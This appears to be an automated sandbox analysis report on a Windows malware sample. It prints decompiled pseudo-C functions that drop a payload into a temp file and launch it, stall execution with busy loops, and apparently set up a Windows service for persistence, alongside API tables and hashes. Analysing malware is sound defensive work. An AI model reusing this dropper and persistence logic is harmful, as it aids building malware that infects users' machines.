                                                                                        						_push(E00D18DD0);
                                                                                        						 *0xd1c278 = _t50 + 0x3e8;
                                                                                        						_push(0);
                                                                                        						_push( &_v12);
                                                                                        						if( *0xd1c0ec() != 0) {
                                                                                        							WaitForSingleObject( *0xd1c29c, 0xffffffff);
                                                                                        							 *0xd1c138(0, _v12, 0xffffffff);
                                                                                        						}
                                                                                        						CloseHandle( *0xd1c29c);
                                                                                        					}
                                                                                        				}
                                                                                        			}



















                                                                                        0x00d1906e
                                                                                        0x00d19076
                                                                                        0x00d1907f
                                                                                        0x00d1908a
                                                                                        0x00d1908d
                                                                                        0x00d19098
                                                                                        0x00d190a5
                                                                                        0x00d190b7
                                                                                        0x00d190cc
                                                                                        0x00d190d0
                                                                                        0x00d1924f
                                                                                        0x00d19255
                                                                                        0x00d19261
                                                                                        0x00d1926d
                                                                                        0x00d1927b
                                                                                        0x00d19281
                                                                                        0x00d19294
                                                                                        0x00d19294
                                                                                        0x00d190d8
                                                                                        0x00d190e0
                                                                                        0x00d19100
                                                                                        0x00d1910b
                                                                                        0x00d19118
                                                                                        0x00d1912b
                                                                                        0x00d1913f
                                                                                        0x00d19144
                                                                                        0x00d1914f
                                                                                        0x00d1915c
                                                                                        0x00d1916f
                                                                                        0x00d19180
                                                                                        0x00d19186
                                                                                        0x00d1918d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d191a0
                                                                                        0x00d191a6
                                                                                        0x00d191ad
                                                                                        0x00d191ba
                                                                                        0x00d191c2
                                                                                        0x00d191d7
                                                                                        0x00d191d7
                                                                                        0x00d191c2
                                                                                        0x00d191da
                                                                                        0x00d191e1
                                                                                        0x00d191e9
                                                                                        0x00d191eb
                                                                                        0x00d191f1
                                                                                        0x00d191f3
                                                                                        0x00d191f8
                                                                                        0x00d191fd
                                                                                        0x00d19204
                                                                                        0x00d1920e
                                                                                        0x00d19213
                                                                                        0x00d1921b
                                                                                        0x00d1921d
                                                                                        0x00d19226
                                                                                        0x00d19230
                                                                                        0x00d1923d
                                                                                        0x00d1923d
                                                                                        0x00d19249
                                                                                        0x00d19249
                                                                                        0x00d191e9

                                                                                        APIs
                                                                                        • memset.NTDLL ref: 00D19076
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • _snwprintf.NTDLL ref: 00D190A5
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19315), ref: 00D190B0
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D190B7
                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00D190C6
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00D190D8
                                                                                        • _snwprintf.NTDLL ref: 00D19118
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19315), ref: 00D19124
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1912B
                                                                                        • _snwprintf.NTDLL ref: 00D1915C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19315), ref: 00D19168
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1916F
                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00D19180
                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00D191A0
                                                                                        • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 00D191BA
                                                                                        • ResetEvent.KERNEL32 ref: 00D191D1
                                                                                        • ReleaseMutex.KERNEL32(00000000), ref: 00D191DA
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D191E1
                                                                                        • GetTickCount.KERNEL32 ref: 00D191EB
                                                                                        • CreateTimerQueueTimer.KERNEL32(?,00000000,00D18DD0,00000000,000003E8,000003E8,00000010), ref: 00D1921E
                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00D19230
                                                                                        • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 00D1923D
                                                                                        • CloseHandle.KERNEL32 ref: 00D19249
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3199319163-0
                                                                                        • Opcode ID: 3b06e149ea776be2c67201b8a143c2f3f4f4415336a9bcc3fe09b808a67acbb1
                                                                                        • Instruction ID: 394dbb4983532c6311363f057610901dbc697d36905505eb40be6ad04cefb609
                                                                                        • Opcode Fuzzy Hash: 3b06e149ea776be2c67201b8a143c2f3f4f4415336a9bcc3fe09b808a67acbb1
                                                                                        • Instruction Fuzzy Hash: 95516D716E0315BFEB105BE0EC5DFDA7B69EB05711F10A115BA05E23E1CE7099828B78
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 205 d19620-d1963e lstrcmpiW 206 d19640-d19646 205->206 207 d19647-d1969e call d118d0 memset * 2 205->207 211 d196a0-d196a3 207->211 212 d196a9-d196f0 GetTempPathW GetTempFileNameW 207->212 211->212 213 d1972b-d19737 call d11970 211->213 217 d19994-d1999f 212->217 218 d196f6-d196f9 212->218 219 d19935-d19980 memset CreateProcessW 213->219 220 d1973d-d19750 213->220 218->217 221 d196ff-d1971c 218->221 219->217 222 d19982-d1998e CloseHandle * 2 219->222 220->217 225 d19756-d19785 220->225 221->217 226 d19722-d19725 221->226 222->217 228 d19787-d19797 225->228 229 d1979c-d197c2 225->229 226->213 226->217 232 d19907-d19909 228->232 229->232 233 d197c8-d197d3 GetLastError 229->233 234 d1990b-d19916 232->234 235 d1991d-d1992f 232->235 233->232 236 d197d9-d197f2 GetProcessHeap RtlAllocateHeap 233->236 234->235 236->232 237 d197f8-d19817 236->237 241 d19930-d19933 237->241 242 d1981d-d1983d 237->242 243 d198d5-d198eb GetProcessHeap HeapFree 241->243 244 d19840-d19842 242->244 243->232 247 d198ed-d19901 GetProcessHeap HeapFree 243->247 245 d198d2 244->245 246 d19848-d19857 244->246 245->243 250 d19859-d1986c 246->250 251 d198bf-d198cc 246->251 247->232 253 d198b8 250->253 254 d1986e-d19877 GetLastError 250->254 251->244 251->245 253->251 254->253 255 d19879-d1988f GetProcessHeap RtlAllocateHeap 254->255 255->253 256 d19891-d198a7 255->256 256->253 258 d198a9-d198b2 GetProcessHeap HeapFree 256->258 258->253
                                                                                        C-Code - Quality: 20%
                                                                                        			E00D19620(void* __ecx, void* __edx) {
                                                                                        				long _v8;
                                                                                        				long _v12;
                                                                                        				void* _v16;
                                                                                        				long _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				signed int _v32;
                                                                                        				long _v46;
                                                                                        				struct _PROCESS_INFORMATION _v52;
                                                                                        				WCHAR* _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				void _v64;
                                                                                        				void* _v68;
                                                                                        				struct _STARTUPINFOW _v140;
                                                                                        				short _v660;
                                                                                        				int _t56;
                                                                                        				void* _t64;
                                                                                        				long _t71;
                                                                                        				void* _t74;
                                                                                        				signed int _t103;
                                                                                        				long _t115;
                                                                                        				void* _t119;
                                                                                        				void* _t120;
                                                                                        				void* _t123;
                                                                                        				intOrPtr _t125;
                                                                                        				void* _t126;
                                                                                        				intOrPtr _t127;
                                                                                        				intOrPtr* _t129;
                                                                                        
                                                                                        				_t56 = lstrcmpiW(0xd1c9c8, 0xd1c7c0);
                                                                                        				if(_t56 != 0) {
                                                                                        					E00D118D0();
                                                                                        					memset( &_v660, 0, 0x208);
                                                                                        					memset( &_v64, 0, 0x1e);
                                                                                        					_v60 = 1;
                                                                                        					_v56 = 0xd1c9c8;
                                                                                        					_v52.hThread = 0xe14;
                                                                                        					_v52.hProcess = 0xd1c7c0;
                                                                                        					_t64 =  *0xd1c218( &_v64);
                                                                                        					if(_t64 != 0 || _v46 != _t64) {
                                                                                        						GetTempPathW(0x104,  &_v660);
                                                                                        						GetTempFileNameW( &_v660, 0, 0,  &_v660);
                                                                                        						_v56 = 0xd1c7c0;
                                                                                        						_v52.hProcess =  &_v660;
                                                                                        						_v46 = 0;
                                                                                        						_t71 =  *0xd1c218( &_v64);
                                                                                        						if(_t71 != 0 || _v46 != _t71) {
                                                                                        							goto L35;
                                                                                        						} else {
                                                                                        							_v46 = _t71;
                                                                                        							_v56 = 0xd1c9c8;
                                                                                        							_v52.hProcess = 0xd1c7c0;
                                                                                        							_t74 =  *0xd1c218( &_v64);
                                                                                        							if(_t74 != 0 || _v46 != _t74) {
                                                                                        								goto L35;
                                                                                        							} else {
                                                                                        								goto L8;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						L8:
                                                                                        						E00D11970();
                                                                                        						if(( *0xd1c2a4 & 0x00000001) == 0) {
                                                                                        							memset( &_v140, 0, 0x44);
                                                                                        							_v140.cb = 0x44;
                                                                                        							_v140.dwFlags = 0x80;
                                                                                        							if(CreateProcessW(0xd1c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
                                                                                        								CloseHandle(_v52);
                                                                                        								CloseHandle(_v52.hThread);
                                                                                        							}
                                                                                        							goto L35;
                                                                                        						} else {
                                                                                        							_t125 =  *0xd1c040(0, 0, 6);
                                                                                        							_v28 = _t125;
                                                                                        							if(_t125 == 0) {
                                                                                        								L35:
                                                                                        								return 1;
                                                                                        							} else {
                                                                                        								_t127 =  *0xd1c0c0(_t125, 0xd1c3b0, 0xd1c3b0, 0x12, 0x10, 2, 0, 0xd1c7c0, 0, 0, 0, 0, 0);
                                                                                        								_v24 = _t127;
                                                                                        								if(_t127 != 0) {
                                                                                        									_push(0);
                                                                                        									_push(0);
                                                                                        									_v12 = 0;
                                                                                        									_push( &_v32);
                                                                                        									_push( &_v20);
                                                                                        									_push(0);
                                                                                        									_push(0);
                                                                                        									_push(3);
                                                                                        									_push(0x30);
                                                                                        									_push(0);
                                                                                        									_push(_t125);
                                                                                        									if( *0xd1c054() == 0 && GetLastError() == 0xea) {
                                                                                        										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
                                                                                        										_v68 = _t119;
                                                                                        										if(_t119 != 0) {
                                                                                        											_push(0);
                                                                                        											_push(0);
                                                                                        											_push( &_v32);
                                                                                        											_push( &_v20);
                                                                                        											_push(_v20);
                                                                                        											_push(_t119);
                                                                                        											_push(3);
                                                                                        											_push(0x30);
                                                                                        											_push(0);
                                                                                        											_push(_t125);
                                                                                        											if( *0xd1c054() == 0) {
                                                                                        												_t120 = _v16;
                                                                                        											} else {
                                                                                        												_t103 =  *0xd1c3ac; // 0x0
                                                                                        												_t123 = _v32 * 0x2c + _t119;
                                                                                        												_v16 = _t123;
                                                                                        												_t120 = _v16;
                                                                                        												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
                                                                                        												while(_t129 < _t123) {
                                                                                        													_t126 =  *0xd1c088(_t125,  *_t129, 1);
                                                                                        													if(_t126 != 0) {
                                                                                        														_push( &_v8);
                                                                                        														_push(0);
                                                                                        														_push(0);
                                                                                        														_push(1);
                                                                                        														_push(_t126);
                                                                                        														if( *0xd1c0b0() == 0 && GetLastError() == 0x7a) {
                                                                                        															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
                                                                                        															if(_t120 != 0) {
                                                                                        																_t115 =  *0xd1c0b0(_t126, 1, _t120, _v8,  &_v8);
                                                                                        																_v12 = _t115;
                                                                                        																if(_t115 == 0) {
                                                                                        																	HeapFree(GetProcessHeap(), _t115, _t120);
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														 *0xd1c0a8(_t126);
                                                                                        													}
                                                                                        													_t125 = _v28;
                                                                                        													_t129 = _t129 + 0x2c;
                                                                                        													_t123 = _v16;
                                                                                        													if(_v12 == 0) {
                                                                                        														continue;
                                                                                        													}
                                                                                        													break;
                                                                                        												}
                                                                                        												_t127 = _v24;
                                                                                        											}
                                                                                        											HeapFree(GetProcessHeap(), 0, _v68);
                                                                                        											if(_v12 != 0) {
                                                                                        												 *0xd1c090(_t127, 1, _t120);
                                                                                        												HeapFree(GetProcessHeap(), 0, _t120);
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t127 =  *0xd1c088(_t125, 0xd1c3b0, 0x10);
                                                                                        								}
                                                                                        								if(_t127 != 0) {
                                                                                        									 *0xd1c048(_t127, 0, 0);
                                                                                        									 *0xd1c0a8(_t127);
                                                                                        								}
                                                                                        								 *0xd1c0a8(_t125);
                                                                                        								return 1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					return _t56;
                                                                                        				}
                                                                                        			}































                                                                                        0x00d19636
                                                                                        0x00d1963e
                                                                                        0x00d19647
                                                                                        0x00d1965a
                                                                                        0x00d1966b
                                                                                        0x00d19674
                                                                                        0x00d19680
                                                                                        0x00d19687
                                                                                        0x00d1968e
                                                                                        0x00d19696
                                                                                        0x00d1969e
                                                                                        0x00d196b5
                                                                                        0x00d196c7
                                                                                        0x00d196d3
                                                                                        0x00d196da
                                                                                        0x00d196e1
                                                                                        0x00d196e8
                                                                                        0x00d196f0
                                                                                        0x00000000
                                                                                        0x00d196ff
                                                                                        0x00d196ff
                                                                                        0x00d19706
                                                                                        0x00d1970d
                                                                                        0x00d19714
                                                                                        0x00d1971c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d1971c
                                                                                        0x00d1972b
                                                                                        0x00d1972b
                                                                                        0x00d1972b
                                                                                        0x00d19737
                                                                                        0x00d19940
                                                                                        0x00d19949
                                                                                        0x00d19956
                                                                                        0x00d19980
                                                                                        0x00d19985
                                                                                        0x00d1998e
                                                                                        0x00d1998e
                                                                                        0x00000000
                                                                                        0x00d1973d
                                                                                        0x00d19749
                                                                                        0x00d1974b
                                                                                        0x00d19750
                                                                                        0x00d19996
                                                                                        0x00d1999f
                                                                                        0x00d19756
                                                                                        0x00d1977e
                                                                                        0x00d19780
                                                                                        0x00d19785
                                                                                        0x00d1979c
                                                                                        0x00d1979e
                                                                                        0x00d197a3
                                                                                        0x00d197aa
                                                                                        0x00d197ae
                                                                                        0x00d197af
                                                                                        0x00d197b1
                                                                                        0x00d197b3
                                                                                        0x00d197b5
                                                                                        0x00d197b7
                                                                                        0x00d197b9
                                                                                        0x00d197c2
                                                                                        0x00d197eb
                                                                                        0x00d197ed
                                                                                        0x00d197f2
                                                                                        0x00d197f8
                                                                                        0x00d197fa
                                                                                        0x00d197ff
                                                                                        0x00d19803
                                                                                        0x00d19804
                                                                                        0x00d19807
                                                                                        0x00d19808
                                                                                        0x00d1980a
                                                                                        0x00d1980c
                                                                                        0x00d1980e
                                                                                        0x00d19817
                                                                                        0x00d19930
                                                                                        0x00d1981d
                                                                                        0x00d1981d
                                                                                        0x00d1982e
                                                                                        0x00d19832
                                                                                        0x00d19835
                                                                                        0x00d1983a
                                                                                        0x00d19840
                                                                                        0x00d19853
                                                                                        0x00d19857
                                                                                        0x00d1985c
                                                                                        0x00d1985d
                                                                                        0x00d1985f
                                                                                        0x00d19861
                                                                                        0x00d19863
                                                                                        0x00d1986c
                                                                                        0x00d1988b
                                                                                        0x00d1988f
                                                                                        0x00d1989c
                                                                                        0x00d198a2
                                                                                        0x00d198a7
                                                                                        0x00d198b2
                                                                                        0x00d198b2
                                                                                        0x00d198a7
                                                                                        0x00d1988f
                                                                                        0x00d198b9
                                                                                        0x00d198b9
                                                                                        0x00d198bf
                                                                                        0x00d198c2
                                                                                        0x00d198c9
                                                                                        0x00d198cc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d198cc
                                                                                        0x00d198d2
                                                                                        0x00d198d2
                                                                                        0x00d198e1
                                                                                        0x00d198eb
                                                                                        0x00d198f1
                                                                                        0x00d19901
                                                                                        0x00d19901
                                                                                        0x00d198eb
                                                                                        0x00d197f2
                                                                                        0x00d19787
                                                                                        0x00d19795
                                                                                        0x00d19795
                                                                                        0x00d19909
                                                                                        0x00d19910
                                                                                        0x00d19917
                                                                                        0x00d19917
                                                                                        0x00d1991e
                                                                                        0x00d1992f
                                                                                        0x00d1992f
                                                                                        0x00d19750
                                                                                        0x00d19737
                                                                                        0x00d19646
                                                                                        0x00d19646
                                                                                        0x00d19646

                                                                                        APIs
                                                                                        • lstrcmpiW.KERNEL32(00D1C9C8,00D1C7C0), ref: 00D19636
                                                                                        • memset.NTDLL ref: 00D1965A
                                                                                        • memset.NTDLL ref: 00D1966B
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00D196B5
                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00D196C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Tempmemset$FileNamePathlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 2872760765-0
                                                                                        • Opcode ID: a4ea218bc38b6d03b6cdddd0e01be50452f481feba695fc94df7a716f8e5c7a1
                                                                                        • Instruction ID: 1081e9d38846c3f6063dfb217f845f8d406bc67d29c5d5597bcd9fd6329a3611
                                                                                        • Opcode Fuzzy Hash: a4ea218bc38b6d03b6cdddd0e01be50452f481feba695fc94df7a716f8e5c7a1
                                                                                        • Instruction Fuzzy Hash: 25A19471AD0309BFEB219BA0EC99FEEB778AB08705F145015FA05E6290DF7099858F74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 259 d19a90-d19ace memset * 2 260 d19ad0-d19ad6 259->260 261 d19ad8 GetLastError 260->261 262 d19ade-d19ae5 260->262 261->262 262->260 263 d19ae7-d19b59 GetTickCount call d12240 call d11830 _snwprintf GetProcessHeap HeapFree 262->263 268 d19b60-d19b66 263->268 269 d19b68 GetLastError 268->269 270 d19b6e-d19b75 268->270 269->270 270->268 271 d19b77-d19b9a CreateFileW 270->271 272 d19ba0-d19ba6 271->272 273 d19ba8 GetLastError 272->273 274 d19bae-d19bb5 272->274 273->274 274->272 275 d19bb7-d19bba 274->275 276 d19bd4 275->276 277 d19bbc-d19bce WriteFile CloseHandle 275->277 278 d19bd6 276->278 277->276 279 d19bd8-d19bde 278->279 280 d19be0 GetLastError 279->280 281 d19be6-d19bed 279->281 280->281 281->279 282 d19bef-d19c14 CreateProcessW 281->282 283 d19c16-d19c25 Sleep 282->283 284 d19c2e-d19c46 CloseHandle * 2 282->284 283->278 285 d19c27-d19c2d 283->285
                                                                                        C-Code - Quality: 93%
                                                                                        			E00D19A90(void* __ecx, long __edx) {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        				struct _PROCESS_INFORMATION _v28;
                                                                                        				struct _STARTUPINFOW _v100;
                                                                                        				char _v228;
                                                                                        				short _v748;
                                                                                        				signed int _t28;
                                                                                        				int _t46;
                                                                                        				void* _t52;
                                                                                        				void* _t59;
                                                                                        				void* _t60;
                                                                                        				short _t61;
                                                                                        				void* _t64;
                                                                                        				void* _t65;
                                                                                        				void* _t66;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        
                                                                                        				_v8 = __edx;
                                                                                        				_t52 = __ecx;
                                                                                        				memset( &_v100, 0, 0x44);
                                                                                        				memset( &_v28, 0, 0x10);
                                                                                        				_v100.cb = 0x44;
                                                                                        				_v100.dwFlags = 0x80;
                                                                                        				_t61 = 0;
                                                                                        				do {
                                                                                        					if(_t61 < 0xfa00) {
                                                                                        						GetLastError();
                                                                                        					}
                                                                                        					_t61 = _t61 + 1;
                                                                                        				} while (_t61 < 0x8000000);
                                                                                        				_t28 = GetTickCount();
                                                                                        				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
                                                                                        				E00D12240( &_v228, _t7);
                                                                                        				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
                                                                                        				E00D11830(0xd11370, 0xc, 0x7d1cc189,  &_v12);
                                                                                        				_t64 = _v12;
                                                                                        				 *0xd1c200( &_v748, 0x104, _t64, 0xd1c5b8,  &_v228);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t64);
                                                                                        				_t65 = 0;
                                                                                        				do {
                                                                                        					if(_t65 < 0xfa00) {
                                                                                        						GetLastError();
                                                                                        					}
                                                                                        					_t65 = _t65 + 1;
                                                                                        				} while (_t65 < 0x8000000);
                                                                                        				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                        				_t66 = 0;
                                                                                        				do {
                                                                                        					if(_t66 < 0xfa00) {
                                                                                        						GetLastError();
                                                                                        					}
                                                                                        					_t66 = _t66 + 1;
                                                                                        				} while (_t66 < 0x8000000);
                                                                                        				if(_t59 != 0xffffffff) {
                                                                                        					WriteFile(_t59, _t52, _v8,  &_v8, 0);
                                                                                        					CloseHandle(_t59);
                                                                                        				}
                                                                                        				_t60 = 0;
                                                                                        				do {
                                                                                        					_t67 = 0;
                                                                                        					do {
                                                                                        						if(_t67 < 0xfa00) {
                                                                                        							GetLastError();
                                                                                        						}
                                                                                        						_t67 = _t67 + 1;
                                                                                        					} while (_t67 < 0x8000000);
                                                                                        					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
                                                                                        					if(_t46 != 0) {
                                                                                        						CloseHandle(_v28);
                                                                                        						return CloseHandle(_v28.hThread);
                                                                                        					} else {
                                                                                        						goto L20;
                                                                                        					}
                                                                                        					L23:
                                                                                        					L20:
                                                                                        					_t60 = _t60 + 1;
                                                                                        					Sleep(0xc8);
                                                                                        				} while (_t60 < 0x10);
                                                                                        				return _t46;
                                                                                        				goto L23;
                                                                                        			}




















                                                                                        0x00d19aa1
                                                                                        0x00d19aa7
                                                                                        0x00d19aa9
                                                                                        0x00d19ab7
                                                                                        0x00d19ac0
                                                                                        0x00d19ac7
                                                                                        0x00d19ace
                                                                                        0x00d19ad0
                                                                                        0x00d19ad6
                                                                                        0x00d19ad8
                                                                                        0x00d19ad8
                                                                                        0x00d19ade
                                                                                        0x00d19adf
                                                                                        0x00d19ae7
                                                                                        0x00d19af8
                                                                                        0x00d19afb
                                                                                        0x00d19b07
                                                                                        0x00d19b1d
                                                                                        0x00d19b22
                                                                                        0x00d19b3e
                                                                                        0x00d19b51
                                                                                        0x00d19b57
                                                                                        0x00d19b60
                                                                                        0x00d19b66
                                                                                        0x00d19b68
                                                                                        0x00d19b68
                                                                                        0x00d19b6e
                                                                                        0x00d19b6f
                                                                                        0x00d19b96
                                                                                        0x00d19b98
                                                                                        0x00d19ba0
                                                                                        0x00d19ba6
                                                                                        0x00d19ba8
                                                                                        0x00d19ba8
                                                                                        0x00d19bae
                                                                                        0x00d19baf
                                                                                        0x00d19bba
                                                                                        0x00d19bc7
                                                                                        0x00d19bce
                                                                                        0x00d19bce
                                                                                        0x00d19bd4
                                                                                        0x00d19bd6
                                                                                        0x00d19bd6
                                                                                        0x00d19bd8
                                                                                        0x00d19bde
                                                                                        0x00d19be0
                                                                                        0x00d19be0
                                                                                        0x00d19be6
                                                                                        0x00d19be7
                                                                                        0x00d19c0c
                                                                                        0x00d19c14
                                                                                        0x00d19c31
                                                                                        0x00d19c46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d19c16
                                                                                        0x00d19c1b
                                                                                        0x00d19c1c
                                                                                        0x00d19c22
                                                                                        0x00d19c2d
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memset.NTDLL ref: 00D19AA9
                                                                                        • memset.NTDLL ref: 00D19AB7
                                                                                        • GetLastError.KERNEL32 ref: 00D19AD8
                                                                                        • GetTickCount.KERNEL32 ref: 00D19AE7
                                                                                        • _snwprintf.NTDLL ref: 00D19B3E
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D19B4A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19B51
                                                                                        • GetLastError.KERNEL32 ref: 00D19B68
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D19B90
                                                                                        • GetLastError.KERNEL32 ref: 00D19BA8
                                                                                        • WriteFile.KERNEL32(00000000,?,00D18F6C,00D18F6C,00000000), ref: 00D19BC7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D19BCE
                                                                                        • GetLastError.KERNEL32 ref: 00D19BE0
                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00D19C0C
                                                                                        • Sleep.KERNEL32(000000C8), ref: 00D19C1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2430354324-0
                                                                                        • Opcode ID: c9d7e67893aa3023aea2eef4c095cee1eb2d1890b8f07892fee7b36932a6e47b
                                                                                        • Instruction ID: 94dba51c325f8e575ee2c6cf3e1f6f957138b4704f33424f2e2fd2dd982353c8
                                                                                        • Opcode Fuzzy Hash: c9d7e67893aa3023aea2eef4c095cee1eb2d1890b8f07892fee7b36932a6e47b
                                                                                        • Instruction Fuzzy Hash: 0A41A2729D0318BBEB109BA4EC8DBEDB7A9EB04301F004161FA49E6191DE3059C68BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 67%
                                                                                        			E00D18520(void* _a4, long* _a8) {
                                                                                        				char _v8;
                                                                                        				void* _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				void* _v20;
                                                                                        				char _v24;
                                                                                        				void* _v28;
                                                                                        				char _v32;
                                                                                        				void* _v40;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				char _v60;
                                                                                        				char _v188;
                                                                                        				void* _t42;
                                                                                        				signed char* _t62;
                                                                                        				void* _t64;
                                                                                        				void _t79;
                                                                                        				long _t82;
                                                                                        				long* _t83;
                                                                                        				signed char* _t88;
                                                                                        				void* _t92;
                                                                                        				long* _t103;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        
                                                                                        				_v32 = 0x10;
                                                                                        				_t42 = E00D18420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
                                                                                        				_t103 = _a8;
                                                                                        				_v28 = _t42;
                                                                                        				_t83 =  &(_t103[1]);
                                                                                        				 *_t83 = 0;
                                                                                        				 *_t103 = 0;
                                                                                        				if(_t42 != 0) {
                                                                                        					if(E00D18700( &_v40,  &_v32) != 0) {
                                                                                        						if(E00D123F0( &_v40,  &_v12) != 0) {
                                                                                        							E00D11830(0xd1c020, 0xc, 0x58619fa4,  &_a4);
                                                                                        							_t88 =  *0xd1c298; // 0x0
                                                                                        							_t104 = _a4;
                                                                                        							 *0xd1c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
                                                                                        							HeapFree(GetProcessHeap(), 0, _t104);
                                                                                        							_t62 =  *0xd1c298; // 0x0
                                                                                        							_push(_t88);
                                                                                        							_t64 = E00D11C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
                                                                                        							_t105 = _v12;
                                                                                        							if(_t64 != 0) {
                                                                                        								_push(_v8);
